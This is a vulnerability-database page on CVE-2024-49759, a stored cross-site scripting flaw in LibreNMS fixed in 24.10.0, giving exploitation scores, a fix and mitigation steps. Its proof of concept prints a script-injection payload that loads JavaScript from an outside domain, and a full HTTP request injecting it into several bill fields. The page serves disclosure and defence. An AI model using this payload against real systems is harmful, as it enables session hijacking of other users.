NIST deprecates RSA-2048 from 2030. Find every one of them before attackers do.
🐘
🐘 Packagist
Not in CISA KEV
MEDIUM severity

CVE-2024-49759 — librenms

MEDIUMFix: librenms/librenms@237f4d2

CVE-2024-49759 is a medium-severity (CVSS 4.8) Cross-site Scripting (XSS) vulnerability in librenms/librenms. 1 public exploit or proof-of-concept reference is indexed, so weaponization risk is real. A fix is available for librenms/librenms — see the affected versions and patch details below.

LibreNMS has a Stored XSS ('Cross-site Scripting') in librenms/includes/html/pages/edituser.inc.php

Also known asGHSA-888j-pjqh-fx58
Published
Updated
Affected
1 pkg
Patched
1 / 1
Exploits
1 known
Exploitation data as of Oct 31, 2026 · OSV.dev, NVD, FIRST.org (EPSS)

Exploitation Status

Proof-of-concept exploit code exists

  • CISA’s SSVC triage found public proof-of-concept exploit code for this CVE, though no confirmed active exploitation.

Exploitation and automatability from CISA’s SSVC triage for CVE-2024-49759.

EPSS Exploitation Probability

via FIRST.org ↗
0.4%probability of exploitation in next 30 days
Lower Risk+0.03%
Lower risk than most CVEs38th percentile — riskier than 38% of all scored CVEsHighest risk
0.00%0.35%0.70%1.05%0.5%0.4%May 26Aug 26Oct 26

Probability of exploitation in the next 30 days, from FIRST.org EPSS.

How urgent is this, really

Where this sits among everything scored

Real-World Exposure

1 pkg affected
🐘librenms/librenms

Real-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.

Description

Summary

A Stored Cross-Site Scripting (XSS) vulnerability in the "Manage User Access" page allows authenticated users to inject arbitrary JavaScript through the "bill_name" parameter when creating a new bill. This vulnerability can lead to the execution of malicious code when visiting the "Bill Access" dropdown in the user's "Manage Access" page, potentially compromising user sessions and allowing unauthorized actions.

Details

When creating a new bill, an attacker can inject the following XSS payload into the "bill_name" parameter: test1'"><script/src=//15.rs>

Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.

The payload triggers in the "Bill Access" dropdown when the user's "Manage Access" page is visited. The sink responsible for this issue is: https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/edituser.inc.php#L309

PoC

  1. Create a new bill using the following payload in the "bill_name" parameter: test1'"><script/src=//15.rs>
  2. Save the bill.
  3. Navigate to the "Manage Access" page for the user.
  4. Observe that the injected script executes in the "Bill Access" dropdown.

Example Request:

POST /bill/bill_id=2/view=edit/ HTTP/1.1
Host: <your_host>
Content-Type: application/x-www-form-urlencoded
Cookie: <your_cookie>

_token=<your_token>&action=update_bill&bill_name=test1%27%22%3E%3Cscript%2Fsrc%3D%2F%2F15.rs%3E&bill_type=cdr&bill_cdr=&bill_cdr_type=Kbps&dir_95th=in&bill_quota=&bill_quota_type=MB&bill_day=1&bill_custid=test2%27%22%3E%3Cscript%2Fsrc%3D%2F%2F15.rs%3E&bill_ref=test3%27%22%3E%3Cscript%2Fsrc%3D%2F%2F15.rs%3E&bill_notes=test4%27%22%3E%3Cscript%2Fsrc%3D%2F%2F15.rs%3E&Submit=Save

Impact

This vulnerability allows authenticated users to execute arbitrary JavaScript in the context of other users' sessions when they visit the "Manage Access" page. The attacker can perform unauthorized actions or compromise user accounts by exploiting this vulnerability.

Affected Packages

1 total 1 fixed
EcosystemPackageVulnerable rangeFix
🐘Packagistlibrenms/librenmsall versions24.10.0composer require librenms/librenms:^24.10.0

Affected Products

1 product · 1 configurations
Application
librenmslibrenms
< 24.10.0
range
Exploits & PoCs
1

Research use only. For defensive security, authorized penetration testing, and academic research only. Never execute exploit code against systems without explicit written authorization.

Detection & mitigation playbook

Open-source dependency
  1. Detect

    Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for librenms/librenms, including transitive dependencies — a direct dependency you never call can still pull in a vulnerable version.

  2. Fix

    Update librenms/librenms to 24.10.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms CVE-2024-49759 is resolved across your whole dependency graph.

  3. Workarounds

    Escape or sanitise the affected output on the server side rather than relying on client-side filtering, and add a Content-Security-Policy that blocks inline script execution so injected markup cannot run even if it reaches the page.

Frequently Asked Questions

### Summary A Stored Cross-Site Scripting (XSS) vulnerability in the "Manage User Access" page allows authenticated users to inject arbitrary JavaScript through the "bill_name" parameter when creating a new bill. This vulnerability can lead to the execution of malicious code when visiting the "Bill Access" dropdown in the user's "Manage Access" page, potentially compromising user sessions and allowing unauthorized actions. ### Details When creating a new bill, an attacker can inject the following XSS payload into the "bill_name" parameter: ```test1'"><script/src=//15.rs>``` Note: The payload
O3 Security · Impact-Aware SCA

Is CVE-2024-49759 in your dependencies?

Find it across Packagist, including transitive dependencies.

CVE-2024-49759: librenms — Fixed in 24.10.0